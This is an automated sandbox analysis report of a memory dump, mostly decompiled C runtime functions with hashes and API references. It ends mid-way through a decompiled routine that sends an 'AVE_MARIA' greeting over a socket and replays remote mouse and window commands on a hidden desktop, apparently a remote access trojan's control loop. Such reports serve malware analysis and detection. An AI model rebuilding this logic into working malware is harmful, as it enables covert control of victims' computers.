							_t108 =  *_t93 -  *((intOrPtr*)(_t93 + 4));
							_t86 = _t97;
							__eflags = _t94 & 0x00000003;
							if((_t94 & 0x00000003) == 0) {
								_t70 =  *(_a4 + 0xc) >> 2;
								__eflags = _t70 & 0x00000001;
								if((_t70 & 0x00000001) != 0) {
									L18:
									_t112 = _a4;
									L19:
									_t95 = _v24;
									_t98 = _v12;
									__eflags = _t95 | _t98;
									if((_t95 | _t98) != 0) {
										_t73 =  *(_t112 + 0xc);
										__eflags = _t73 & 0x00000001;
										if((_t73 & 0x00000001) == 0) {
											__eflags = _v8 - 1;
											if(_v8 == 1) {
												_t75 = E00B64ED0(_t108, _t86, 2, 0);
												_t95 = _v24;
												_t108 = _t75;
											}
											_t108 = _t108 + _t95;
											asm("adc edx, ebx");
											L26:
											_t74 = _t108;
											goto L27;
										}
										_t74 = E00B50BC8(_a4, _t95, _t98, _t108, _t86);
										goto L27;
									}
									goto L26;
								}
								_t59 = E00B55BBD();
								 *_t59 = 0x16;
								goto L17;
							}
							__eflags = _v8 - 1;
							_t96 = _v16;
							_t102 = _v20;
							if(_v8 != 1) {
								L13:
								_t76 =  *((intOrPtr*)(0xb6a6c8 + _t96 * 4));
								__eflags =  *((char*)(_t102 + _t76 + 0x28));
								if( *((char*)(_t102 + _t76 + 0x28)) >= 0) {
									goto L18;
								}
								_t112 = _a4;
								_t77 = E00B50F24( *((intOrPtr*)(_t112 + 4)),  *_t112, _v8);
								_t116 = _t116 + 0xc;
								_t108 = _t108 + _t77;
								asm("adc ebx, edx");
								goto L19;
							}
							_t78 =  *((intOrPtr*)(0xb6a6c8 + _t96 * 4));
							__eflags =  *(_t102 + _t78 + 0x2d) & 0x00000002;
							if(( *(_t102 + _t78 + 0x2d) & 0x00000002) == 0) {
								goto L13;
							}
							_t74 = E00B50D89(_t86, _t108, _t111, _a4, _t111, _v12);
							goto L27;
						}
						asm("cdq");
						_t74 = _t111 -  *((intOrPtr*)(_a4 + 8));
						asm("sbb ecx, edx");
						goto L27;
					} else {
						if(__eflags < 0) {
							L17:
							_t74 = _t59 | 0xffffffff;
							L27:
							return _t74;
						}
						__eflags = _t111;
						if(_t111 < 0) {
							goto L17;
						}
						goto L7;
					}
				}
				 *((intOrPtr*)(E00B55BBD())) = 0x16;
				return E00B528EC() | 0xffffffff;
			}

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5560f4d5cdfe85ce747e1292176363c19434b34108aea9ffc8f358aff0e19221
Instruction ID: d41646c2cad0681c8e64c8d21194c185906c652467c4dc6e4a22e03696d32a81
Opcode Fuzzy Hash: 5560f4d5cdfe85ce747e1292176363c19434b34108aea9ffc8f358aff0e19221
Instruction Fuzzy Hash: 0B41E870A10108AFDB14EF58C8C1BA97BE1EF49369F2881E8FC48AB351D7719D49C751

Uniqueness

Uniqueness Score: -1.00%

Function 00B588EC, Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00B588EC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				void* _t26;
				void* _t35;

				E00B586BD(_t35,  &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 == 0) {
					L3:
					return 0;
				}
				_t26 = E00B61E53( &_v8, _a4, _v20, _a12, 0x180); // executed
				if(_t26 != 0) {
					goto L3;
				}
				 *0xb6a6c4 =  *0xb6a6c4 + 1;
				asm("lock or [eax], ecx");
				 *((intOrPtr*)(_a16 + 8)) = 0;
				 *((intOrPtr*)(_a16 + 0x1c)) = 0;
				 *((intOrPtr*)(_a16 + 4)) = 0;
				 *_a16 = 0;
				 *((intOrPtr*)(_a16 + 0x10)) = _v8;
				return _a16;
			}

APIs

__wsopen_s.LIBCMT ref: 00B58926

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: b3cb8b342a06ee029657eb679751cb05c2b2606fdf6fde61f7cf7d4248824aac
Instruction ID: a3ae17a7773bca563d3144d28c4674d38f7ad45e8f30474afcb6b4ab0927c7b2
Opcode Fuzzy Hash: b3cb8b342a06ee029657eb679751cb05c2b2606fdf6fde61f7cf7d4248824aac
Instruction Fuzzy Hash: D3115A71904109AFCF05DF59E940AAA7BF4EF48300F054099FC08AB311DB31DE25CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B5AE4B, Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00B5AE4B(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E00B598AF(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E00B5DC74(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *(_t32 - 0x2b) =  *(_t32 - 0x2b) & 0x000000f8;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E00B564B8(0);
				return _t35;
			}

0x00b5ae51
0x00b5ae58
0x00b5ae5d
0x00b5ae61
0x00b5ae68
0x00b5ae6e
0x00b5ae6e
0x00b5ae74
0x00b5ae76
0x00b5ae79
0x00b5ae79
0x00b5ae7c
0x00b5ae7e
0x00b5ae84
0x00b5ae88
0x00b5ae8d
0x00b5ae91
0x00b5ae93
0x00b5ae96
0x00b5ae9c
0x00b5aea3
0x00b5aea7
0x00b5aeab
0x00b5aeae
0x00b5aeb1
0x00b5aeb1
0x00b5aeb5
0x00b5aeb8
0x00b5ae6a
0x00b5ae6a
0x00b5ae6a
0x00b5aeba
0x00b5aec7

APIs

Part of subcall function 00B598AF: RtlAllocateHeap.NTDLL(00000008,00B48FAA,00000000,?,00B584AF,00000001,00000364,00000007,000000FF,?,00000104,?,00B55BC2,00B56F5F), ref: 00B598F0

_free.LIBCMT ref: 00B5AEBA

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 38082dfc9f628e9a655aa6aea789138162910ffc07eda6152a262ca736813909
Instruction ID: f6260fbe64dba2076ce5b9805fafa3ae5567c0192821973bc5688a0aa8d043f7
Opcode Fuzzy Hash: 38082dfc9f628e9a655aa6aea789138162910ffc07eda6152a262ca736813909
Instruction Fuzzy Hash: 9D012B726043165BC3309F98D885A99FBD8EB05371F5403D9ED44B76C0D7706C18C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B510AF, Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00B510AF(void* __ecx, intOrPtr _a4) {
				void* _t16;
				signed int _t24;
				signed int _t25;
				intOrPtr _t27;

				_t27 = _a4;
				if(_t27 == 0) {
					 *((intOrPtr*)(E00B55BBD())) = 0x16;
					return E00B528EC() | 0xffffffff;
				}
				_push(_t24);
				_t25 = _t24 | 0xffffffff;
				if(( *(_t27 + 0xc) >> 0x0000000d & 0x00000001) != 0) {
					_t25 = E00B58E48(_t27);
					E00B58C3D(_t27);
					_t16 = E00B58B12(E00B572EE(_t27)); // executed
					if(_t16 >= 0) {
						if( *(_t27 + 0x1c) != 0) {
							E00B564B8( *(_t27 + 0x1c));
							 *(_t27 + 0x1c) =  *(_t27 + 0x1c) & 0x00000000;
						}
					} else {
						_t25 = _t25 | 0xffffffff;
					}
				}
				E00B585BE(_t27);
				return _t25;
			}

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ac1d3a31b47b2c83fdd27da8c0a991d6d4fbe98550b29860e1932f47ed1f2d1
Instruction ID: 84c4f11138dcf8aa5796d93a2edf5cdcc7f034c2f74e8af58a5ed54a0e107839
Opcode Fuzzy Hash: 0ac1d3a31b47b2c83fdd27da8c0a991d6d4fbe98550b29860e1932f47ed1f2d1
Instruction Fuzzy Hash: E5F0F432901A141BDA213A2E9C06B6A32DC8F52337F140BD5FE75A31D2DF78D80E86E1

Uniqueness

Uniqueness Score: -1.00%

Function 00B61DE3, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00B61DE3(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t22;
				void* _t25;
				signed int _t27;
				signed int _t28;

				_t25 = __ecx;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(E00B55F7B(_t25, _a12,  &_v28, E00B56E67(__eflags)) == 0) {
					_push(_a28);
					_t22 = E00B61E73(_t25, __eflags, _a4, _a8, _v20, _a16, _a20, _a24); // executed
					_t28 = _t22;
				} else {
					_t28 = _t27 | 0xffffffff;
				}
				if(_v8 != 0) {
					E00B564B8(_v20);
				}
				return _t28;
			}

0x00b61de3
0x00b61dee
0x00b61df1
0x00b61df4
0x00b61df7
0x00b61dfa
0x00b61dfd
0x00b61e17
0x00b61e1e
0x00b61e33
0x00b61e3b
0x00b61e19
0x00b61e19
0x00b61e19
0x00b61e41
0x00b61e46
0x00b61e4b
0x00b61e52

APIs

_free.LIBCMT ref: 00B61E46

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e81dc3ff9b44c22a5475de0617da7fcc94e846a15b72b02c6cdca9cabd4a6401
Instruction ID: 310b44d34e6b3c33fd2e3079c51a67cfa9bde75f0eb85e3dba804b4fb5afecf7
Opcode Fuzzy Hash: e81dc3ff9b44c22a5475de0617da7fcc94e846a15b72b02c6cdca9cabd4a6401
Instruction Fuzzy Hash: D2012172C01159BFCF02AFA8DC01AEE7FF5AB08310F5445A5FD14A2151E6368A249B91

Uniqueness

Uniqueness Score: -1.00%

Function 00B598AF, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B598AF(signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xb6a9c4, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00B54AF9();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00B55BBD())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00B54B44(__eflags, _t19);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00b598b5
0x00b598ba
0x00b598c8
0x00b598c8
0x00b598ce
0x00b598d0
0x00b598d0
0x00b598e7
0x00b598f0
0x00b598f8
0x00000000
0x00000000
0x00b598d8
0x00b598da
0x00b598fc
0x00b59901
0x00b59907
0x00000000
0x00b59907
0x00b598dd
0x00b598e3
0x00b598e5
0x00000000
0x00000000
0x00b598e5
0x00000000
0x00b598e7
0x00b598c0
0x00b598c6
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00B48FAA,00000000,?,00B584AF,00000001,00000364,00000007,000000FF,?,00000104,?,00B55BC2,00B56F5F), ref: 00B598F0

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a2e16d878fa7f0048382d41043bed4d8e759a6caa9aad976e3ebac37ed1f2c51
Instruction ID: c7aff50fff7458cc5385fb36e553cc0074aeb92d5938135820c6b22f3fcf0df7
Opcode Fuzzy Hash: a2e16d878fa7f0048382d41043bed4d8e759a6caa9aad976e3ebac37ed1f2c51
Instruction Fuzzy Hash: 23F0B431641625E6EF212B629C45B5B3BC8EF437A2B1940E1EC14A71C0DF64D80886A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B62FF5, Relevance: 1.5, APIs: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B62FF5(void* __eflags, intOrPtr* _a4) {
				intOrPtr _t11;
				intOrPtr _t15;
				intOrPtr* _t24;

				 *0xb6a6c4 =  *0xb6a6c4 + 1;
				_t24 = _a4;
				_t11 = E00B56F1C(0x1000); // executed
				 *((intOrPtr*)(_t24 + 4)) = _t11;
				E00B564B8(0);
				if( *((intOrPtr*)(_t24 + 4)) == 0) {
					asm("lock or [eax], ecx");
					 *((intOrPtr*)(_t24 + 4)) = _t24 + 0x14;
					0x1000 = 2;
				} else {
					_push(0x40);
					asm("lock or [eax], ecx");
				}
				 *((intOrPtr*)(_t24 + 0x18)) = 0x1000;
				_t15 =  *((intOrPtr*)(_t24 + 4));
				 *(_t24 + 8) =  *(_t24 + 8) & 0x00000000;
				 *_t24 = _t15;
				return _t15;
			}

0x00b62ffa
0x00b63001
0x00b6300b
0x00b63012
0x00b63015
0x00b63023
0x00b63032
0x00b6303a
0x00b6303d
0x00b63025
0x00b63025
0x00b63028
0x00b63028
0x00b6303e
0x00b63041
0x00b63044
0x00b63049
0x00b6304d

APIs

Part of subcall function 00B56F1C: RtlAllocateHeap.NTDLL(00000000,00000104,?,?,00B48FAA,00000104), ref: 00B56F4E

_free.LIBCMT ref: 00B63015

Part of subcall function 00B564B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 036924c99816f0884f1c3780f9ac7ff56d5e89cd291c8067b7c70a0aa2ba41db
Instruction ID: c992775e13074271442c2c73251a48161e7dc70ef82ed91cceaeeff1ac6c29db
Opcode Fuzzy Hash: 036924c99816f0884f1c3780f9ac7ff56d5e89cd291c8067b7c70a0aa2ba41db
Instruction Fuzzy Hash: ADF0F6721003008FD3309F45D401B52F7FCEF40B12F10846FE29A876A1CBF8A4058B54

Uniqueness

Uniqueness Score: -1.00%

Function 00B56F1C, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B56F1C(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00B55BBD())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xb6a9c4, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00B54AF9();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00B54B44(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,?,?,00B48FAA,00000104), ref: 00B56F4E

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 54405ab98f22ca1b1593eaefd04978aadc7b74b1554d8c937a5eff735678ccda
Instruction ID: 27a844bddbb320cd7a956409ceb79f8cf33db31d1468fc752bb85c42a153a3e3
Opcode Fuzzy Hash: 54405ab98f22ca1b1593eaefd04978aadc7b74b1554d8c937a5eff735678ccda
Instruction Fuzzy Hash: CFE0E531A053116AD6203665AC05B5A37C8EB613A7F5501D0ED55971C0DFA4CC4885B5

Uniqueness

Uniqueness Score: -1.00%

Function 00B61B26, Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B61B26(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}

0x00b61b43
0x00b61b4a

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00B61F1C,?,?,00000000,?,00B61F1C,00000000,0000000C), ref: 00B61B43

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dd61c6aabfafea9183610f378d9162387567f51b8f11bc8ebf94e5197ed9b119
Instruction ID: cdb13f47e2ca44311242c625e7518ff402c840f80f0b42531de72617250d4bb2
Opcode Fuzzy Hash: dd61c6aabfafea9183610f378d9162387567f51b8f11bc8ebf94e5197ed9b119
Instruction Fuzzy Hash: 04D06C3205410DBBDF028F84DC06EDA3BAAFB48714F014000FA1856060CB76E831AB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B50985, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B50985(intOrPtr _a4) {
				intOrPtr _v8;
				void* _t5;

				_v8 = 0;
				_t5 = E00B564B8(_a4); // executed
				return _t5;
			}

0x00b5098e
0x00b50998
0x00b509a1

APIs

_free.LIBCMT ref: 00B50998

Part of subcall function 00B564B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 539204b147195f509940479dbda494578400ec6dc542fe84ac0dddfc46da8b04
Instruction ID: 5846aa584cce186bb71bccc1332652c024aeae9898935a9d136320b51cd439b7
Opcode Fuzzy Hash: 539204b147195f509940479dbda494578400ec6dc542fe84ac0dddfc46da8b04
Instruction Fuzzy Hash: A3C08C3140420CBBCF00EF85E806B5EBBACDB80320FA041C8FC0C07310DA72AE1096D0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B45BB1, Relevance: 73.9, APIs: 37, Strings: 5, Instructions: 445
windownetworkthreadCOMMONCrypto

Download Yara Rule

C-Code - Quality: 57%

			E00B45BB1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				signed int _v24;
				char _v376;
				char _v404;
				struct _WINDOWPLACEMENT _v420;
				struct tagRECT _v436;
				struct tagRECT _v452;
				char _v454;
				short _v456;
				char _v460;
				char _v462;
				short _v464;
				char _v468;
				int _v476;
				signed int _v480;
				struct tagPOINT _v488;
				struct HWND__* _v492;
				long _v496;
				int _v500;
				long _v504;
				struct tagPOINT _v512;
				intOrPtr _v516;
				signed int _v520;
				intOrPtr _v524;
				void* __ebp;
				signed int _t119;
				int _t139;
				signed int _t140;
				signed int _t151;
				signed int _t154;
				unsigned int _t158;
				signed short _t160;
				struct HWND__* _t161;
				int _t162;
				int _t165;
				struct HMENU__* _t183;
				long _t189;
				struct tagPOINT _t198;
				long _t204;
				struct HWND__* _t206;
				long _t210;
				struct tagPOINT _t214;
				int _t215;
				CHAR* _t216;
				void* _t217;
				signed short _t218;
				intOrPtr _t220;
				int _t222;
				intOrPtr _t225;
				long _t227;
				intOrPtr _t228;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				struct HMENU__* _t240;
				intOrPtr* _t243;
				intOrPtr* _t245;
				struct HWND__* _t246;
				signed short _t247;
				int _t250;
				struct HWND__* _t251;
				int _t254;
				void* _t257;
				signed int _t258;
				signed int _t260;
				void* _t268;

				_t260 = (_t258 & 0xfffffff8) - 0x1a4;
				_t119 =  *0xb69014; // 0xce6f0fb5
				_v8 = _t119 ^ _t260;
				_push(__esi);
				_push(__edi);
				_t225 = E00B446F7(__edi, __esi);
				_v436.bottom = _t225;
				SetThreadDesktop( *0xb6ae3c);
				_t243 = __imp__#19;
				_t204 = 0;
				_push(0);
				_push(0xa);
				_push("AVE_MARIA");
				_push(_t225);
				if( *_t243() <= 0) {
					L47:
					return E00B4AE43(_v24 ^ _t260);
				}
				_push(0);
				_push(4);
				_v420.ptMinPosition = 1;
				_push( &(_v420.ptMinPosition));
				_push(_t225);
				if( *_t243() <= 0) {
					goto L47;
				}
				_t245 = __imp__#16;
				_push(0);
				_push(4);
				_push( &_v404);
				_push(_t225);
				if( *_t245() == 0) {
					goto L47;
				}
				 *0xb6ae34 = CreateThread(0, 0, E00B44798, 0, 0, 0);
				_v436.top = 0;
				_v452.right = 0;
				_v452.top = 0;
				_v452.bottom = 0;
				_v436.left = 0;
				E00B457CD(0, _t225, _t245, _t257);
				_push(0);
				_push(4);
				_push( &_v452);
				_push(_t225);
				if( *_t245() <= 0) {
					L46:
					TerminateThread( *0xb6ae34, _t204);
					goto L47;
				}
				_t206 = _v452.bottom;
				while(1) {
					_push(0);
					_push(4);
					_push( &(_v452.right));
					_push(_t225);
					if( *_t245() <= 0) {
						break;
					}
					_push(0);
					_push(4);
					_push( &_v488);
					_push(_t225);
					if( *_t245() <= 0) {
						break;
					}
					_t139 = _v500;
					_v520 = 0;
					_t268 = _t139 - 0x404;
					if(_t268 > 0) {
						_t140 = _t139 - 0x405;
						__eflags = _t140;
						if(__eflags == 0) {
							E00B456CF(_t206, _t225, _t245, __eflags);
							L31:
							ScreenToClient(_t206,  &_v512);
							_push(_v512.y);
							_push(_v512.x);
							_push(_t206);
							while(1) {
								_t246 = ChildWindowFromPoint();
								if(_t246 == 0) {
									break;
								}
								__eflags = _t246 - _t206;
								if(__eflags == 0) {
									break;
								}
								_t206 = _t246;
								ScreenToClient(_t246,  &_v512);
								_push(_v512.y);
								_push(_v512.x);
								_push(_t246);
							}
							if(_v520 == 0) {
								_t210 = _v504;
							} else {
								_t210 = (_v512.y & 0x0000ffff) << 0x00000010 | _v512.x & 0x0000ffff;
								_v504 = _t210;
							}
							PostMessageA(_t206, _v500, _v476, _t210);
							L44:
							_t245 = __imp__#16;
							_push(0);
							_push(4);
							_push( &_v500);
							_push(_t225);
							if( *_t245() > 0) {
								continue;
							}
							break;
						}
						_t151 = _t140 - 1;
						__eflags = _t151;
						if(_t151 == 0) {
							E00B462A9();
							_t220 =  *0xb6ae38; // 0x0
							E00B46268(0xb6ad28, _t220);
							goto L47;
						}
						_t154 = _t151 - 1;
						__eflags = _t154;
						if(_t154 == 0) {
							E00B462A9();
							goto L47;
						}
						__eflags = _t154 - 1;
						if(__eflags == 0) {
							E00B44CEE(_t206, _t225, _t245, __eflags);
							goto L31;
						}
						L23:
						_t158 = _v504;
						_t227 = _v488.x;
						_t247 = _v488.y;
						_t214 = _t158;
						_t160 = _t158 >> 0x10;
						_push(_t160);
						_v520 = 1;
						_v512.x = _t214;
						_v512.y = _t160;
						_v488.x = _t214;
						_v488.y = _t160;
						_t161 = WindowFromPoint(_t214);
						__eflags = _v500 - 0x202;
						_t206 = _t161;
						if(_v500 != 0x202) {
							__eflags = _v500 - 0x201;
							if(_v500 != 0x201) {
								__eflags = _v500 - 0x200;
								if(__eflags != 0) {
									L30:
									_t225 = _v524;
									goto L31;
								}
								__eflags = _v480;
								if(__eflags == 0) {
									L43:
									_t225 = _v524;
									goto L44;
								}
								_t162 = _v492;
								__eflags = _t162;
								if(_t162 != 0) {
									_t206 = _t162;
								} else {
									_v496 = SendMessageA(_t206, 0x84, _t162, _v504);
								}
								_t228 = _t227 - _v512.x;
								_v520 = _t228;
								_v516 = _t247 - _v512.y;
								GetWindowRect(_t206,  &_v452);
								_t165 = _v452.left;
								_t222 = _v452.right - _t165;
								_t215 = _v452.top;
								_t250 = _v452.bottom - _t215;
								__eflags = _v496 - 0xd;
								if(__eflags > 0) {
									_t230 = _v496 - 0xe;
									__eflags = _t230;
									if(_t230 == 0) {
										_t215 = _t215 - _v516;
										_t250 = _t250 + _v516;
										__eflags = _t250;
										goto L75;
									}
									_t231 = _t230 - 1;
									__eflags = _t231;
									if(__eflags == 0) {
										_t250 = _t250 - _v516;
										goto L76;
									}
									_t232 = _t231 - 1;
									__eflags = _t232;
									if(_t232 == 0) {
										_t250 = _t250 - _v516;
										__eflags = _t250;
										goto L72;
									}
									__eflags = _t232 - 1;
									if(__eflags != 0) {
										goto L43;
									}
									_t250 = _t250 - _v516;
